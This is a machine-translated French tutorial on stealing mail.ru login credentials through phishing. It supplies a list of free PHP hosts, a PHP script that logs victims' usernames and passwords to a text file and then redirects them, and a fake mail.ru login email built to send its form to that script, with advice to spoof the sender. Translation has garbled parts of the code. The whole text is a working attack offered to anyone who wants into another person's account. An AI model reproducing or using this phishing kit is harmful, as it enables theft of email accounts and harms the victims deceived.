This page has been robot translated, sorry for typos if any. Original content here.

Pirater le courrier sur mail.ru [SI]

[::. INTRO. ::]

Bonjour! Dans cet article, je vais parler de la façon de pirater une boîte aux lettres sur le service de messagerie gratuit mail.ru.

L'article est destiné aux débutants, au SI , ainsi qu'à tout internaute qui souhaite accéder au compte de quelqu'un d'autre.

Mais d'accord, je ne vais pas écrire à ce sujet depuis longtemps et il est clair "pourquoi une boîte aux lettres est nécessaire pour un pirate, vous comprendrez.

L'article convient aux débutants. Guru s'il vous plaît ne pas lire :)

[::. PRÉPARATION. ::]

Pour commencer, nous aurons besoin d'un hébergement gratuit (mieux payé) avec le support PHP .

* Seulement à l'avance assurez-vous que l'hébergement supporte PHP

Vous pouvez vous inscrire sur l'un de ces éléments:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Enregistré? - Allons plus loin!

De quoi avons-nous besoin?

Tout d'abord, nous avons besoin d'un sniffer (c'est un script qui vous permet d'enregistrer les données reçues dans un fichier texte).


Code PHP:
 <? php $ f = fopen ( "mail.txt" , "at" );
  # fichier où enregistrer le troupeau ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domaine' ]);
  # domain fputs ( $ f , ";" . $ _GET [ 'Mot de passe' ]. "\ n" );
  # mot de passe flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>
 

Considérez le script plus en détail.


Code PHP:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Cette ligne spécifie l'endroit où nous redirigerons l'utilisateur après autorisation sur la lettre-faux .

  • Nous sauvegardons mes.php dans le fichier et le remplissons avec l'hébergement.
  • Créez également le fichier mail.txt dans le répertoire avec le script et placez-le à droite (chmod) 777.

Peut-être avec l'hébergement - tout!

Passons à la lettre même que nous enverrons à la victime sur du savon.


Code de la lettre:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 largeur = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > L' utilisateur vous a envoyé une lettre cachée . <br> Pour afficher l'e-mail, entrez votre identifiant et votre mot de passe . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Autorisation </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: // Carte d'adresse /mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td largeur = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Nom
 
  </ td >
 
  < td largeur = 150 >
 
  < input type = "text" name = "Connexion" >
 
  </ td >
 
  < td largeur = 75 >
 
  < select name = "Domaine" >
 
  < option value = "mail.ru" SELECTED > @ mail .
  com </ option >
 
  < option value = "inbox.ru" > @ boîte de réception .
  com </ option >
 
  < option value = "list.ru" > @list.
  com </ option >
 
  < option value = "bk.ru" > @ bk .
  com </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Password
 
  </ td >
 
  < td >
 
  < input type = "mot de passe" name = "Mot de passe" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Mot de passe oublié ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = case à cocher name = "niveau" valeur = 1 id = "alien" > < label pour = "alien" > Ordinateur extraterrestre </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = "Connexion" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br> <br>
 
  Pour en savoir plus sur les services , rendez - vous sur <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail .
  Ru </ a > <br>
 
  National Mail Service <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  ru </ a > - le meilleur courrier gratuit .
 
  < base > </ div >
 
 

Spécifiez dans le paramètre action le tag de formulaire - l'adresse de votre site (que vous avez enregistré ci-dessus) et le chemin vers le sniffer mes.php .

[!] Il faut faire attention à ce que les données soient passées par une méthode "GET"! Sinon, rien n'en sortira.

Il reste maintenant à envoyer une lettre à la victime, de préférence avec la substitution de l'adresse .

Nous copions le code de la lettre dans le champ de saisie et l'envoyons au format html, après avoir rempli les champs.

Si la victime mord dessus, alors vous avez de la chance :)

Vous pouvez trouver les mots de passe dans le fichier mail.txt .

[::. END. ::]

Je pense tout.

Et comment aborder le cambriolage pour résoudre pour vous.

Merci pour votre attention!

J'attends vos commentaires juste en dessous de ce texte.

Et il vaut mieux ne rien casser;)

Au revoir et à bientôt :)